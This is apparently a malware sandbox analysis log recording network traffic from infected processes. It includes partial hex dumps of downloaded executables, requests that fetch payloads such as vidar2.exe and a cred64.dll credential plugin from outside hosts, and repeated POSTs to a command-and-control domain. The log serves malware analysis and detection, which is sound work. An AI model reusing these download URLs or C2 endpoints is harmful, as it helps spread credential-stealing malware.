00 00 00 00 00 00 00 00 30 04 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 8f 03 00 a0 00 00 00 00 f0 03 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 50 29 00 00 80 5f 03 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 5f 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 5c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 e7 02 00 00 10 00 00 00 e8 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 44 9d 00 00 00 00 03 00 00 9e 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 4c 44 00 00 00 a0 03 00 00 18 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 f0 03 00 00 02 00 00 00 a2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 50 29 00 00 00 00 04 00 00 2a 00 00 00 a4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 13 Dec 2022 19:09:14 GMTContent-Type: application/octet-streamContent-Length: 129024Last-Modified: Tue, 13 Dec 2022 14:34:04 GMTConnection: keep-aliveETag: "63988d5c-1f800"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 9c 01 00 00 58 00 00 00 00 00 00 78 aa 01 00 00 10 00 00 00 b0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 02 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 f0 01 00 4f 00 00 00 00 e0 01 00 26 0e 00 00 00 20 02 00 00 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 e0 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 90 9a 01 00 00 10 00 00 00 9c 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 b4 13 00 00 00 b0 01 00 00 14 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 e1 09 00 00 00 d0 01 00 00 00 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 26 0e 00 00 00 e0 01 00 00 10 00 00 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 65 64 61 74 61 00 00 4f 00 00 00 00 f0 01 00 00 02 00 00 00 c4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 e0 1d 00 00 00 00 02 00 00 1e 00 00 00 c6 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 14 00 00 00 20 02 00 00 14 00 00 00 e4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 40 02 00 00 00 00 00 00 f8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: GET /vidar2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kikangalaassociates.com
                              Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                              Source: global trafficHTTP traffic detected: POST /ppsecure/deviceaddcredential.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 7598Host: login.live.com
                              Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
                              Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4740Host: login.live.com
                              Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4740Host: login.live.com
                              Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4740Host: login.live.com
                              Source: global trafficHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 18.10.0.17134.0.0; IDCRL-cfg 16.000.29158.8; App svchost.exe, 10.0.17134.1, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 4682Host: login.live.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iglyuyotce.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://csigrnv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sigiagum.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rdpcbv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://arfujedsl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nvtalqe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bprujbtf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 128Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ecaapsyol.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 133Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xmhgchsawe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmwhbha.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hhqusu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nvtkvayro.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aroxyrayv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ufutmn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gomlgu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 243Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqmkmifvh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://okpnuoeb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://prhgrykwf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://umgkkbyv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 297Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bljwplujsw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 123Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jqdieq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 142Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qrlpwddo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hmsoq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 307Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rwsblto.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 228Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ikihxohlb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 145Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://sdeypctxsi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 291Host: r3oidsofsios.com
                              Source: global trafficHTTP traffic detected: GET /fusa/bibar.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 31.41.244.228
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jenhfc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: r3oidsofsios.com
                              Source: Joe Sandbox ViewASN Name: AEROEXPRESS-ASRU AEROEXPRESS-ASRU
                              Source: Joe Sandbox ViewASN Name: LVLT-10753US LVLT-10753US
                              Source: Joe Sandbox ViewIP Address: 185.246.221.151 185.246.221.151
                              Source: Joe Sandbox ViewIP Address: 185.246.221.151 185.246.221.151
                              Source: gntuud.exe, 00000015.00000003.499113255.0000000000C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb
                              Source: gntuud.exe, 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/Plugins/cred64.dll
                              Source: gntuud.exe, 00000015.00000003.498981390.0000000000C04000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.785970616.0000000000C07000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/Plugins/cred64.dllXIK
                              Source: gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.php
                              Source: gntuud.exe, 00000015.00000003.499244475.0000000000C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.php?scr=1
                              Source: gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499244475.0000000000C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.php?scr=1T)
                              Source: gntuud.exe, 00000015.00000003.499244475.0000000000C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.php?scr=1l&
                              Source: gntuud.exe, 00000015.00000002.787565484.0000000000C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.php?scr=1t&
                              Source: gntuud.exe, 00000015.00000003.499113255.0000000000C1F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.phpF
                              Source: gntuud.exe, 00000015.00000002.786658213.0000000000C1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.phpM
                              Source: gntuud.exe, 00000015.00000002.785290818.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000003.499661889.0000000000BF4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.phpa
                              Source: gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.phpcu
                              Source: gntuud.exe, 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.phpg
                              Source: gntuud.exe, 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.phpqu.
                              Source: gntuud.exe, 00000015.00000003.499037932.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, gntuud.exe, 00000015.00000002.786384130.0000000000C14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fb73jc3/index.phpwu$
                              Source: gntuud.exe, 00000015.00000002.786658213.0000000000C1D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.79/fbfb73jc3/index.php
                              Source: 8F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: http://95.217.27.105:80
                              Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://go.mail.ru/search
                              Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://nova.rambler.ru/search
                              Source: explorer.exe, 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.775161398.0000000001090000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.413703435.0000000000EE0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000013.00000002.779312783.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.775858605.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.420551387.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.780502207.0000000003377000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000000.432495432.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000002.777038253.0000000000650000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://r3oidsofsios.com/
                              Source: explorer.exe, 00000011.00000000.405174014.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000012.00000002.775161398.0000000001090000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.413703435.0000000000EE0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000013.00000002.779312783.0000000000B57000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000013.00000000.417309353.0000000000530000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000016.00000002.775858605.00000000006D8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000000.420551387.00000000006C0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 0000001A.00000002.780502207.0000000003377000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000000.426593885.0000000003450000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000022.00000000.429438818.00000000005F0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000000.432495432.00000000004E0000.00000040.80000000.00040000.00000000.sdmp, explorer.exe, 00000026.00000002.777038253.0000000000650000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000028.00000000.435504290.0000000000530000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://r3oidsofsios.com/Mozilla/5.0
                              Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://search.aol.com/aol/search
                              Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://search.yahoo.com/search
                              Source: explorer.exe, 0000001F.00000002.776413883.0000000003441000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.google.com/search
                              Source: 8F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199443972360
                              Source: 8F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://t.me/ttruelive
                              Source: 8F68.exe, 0000000C.00000000.404562471.0000000000C42000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://t.me/ttruelivehttps://steamcommunity.com/profiles/76561199443972360http://95.217.27.105:80hi
                              Source: unknownDNS traffic detected: queries for: r3oidsofsios.com
                              Source: C:\Users\user\AppData\Local\Temp\9545.exeCode function: 14_2_00DD42B0 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,14_2_00DD42B0
                              Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
                              Source: global trafficHTTP traffic detected: GET /vidar2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kikangalaassociates.com
                              Source: global trafficHTTP traffic detected: GET /fusa/bibar.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 31.41.244.228
                              Source: global trafficHTTP traffic detected: GET /fb73jc3/Plugins/cred64.dll HTTP/1.1Host: 62.204.41.79
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49682 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
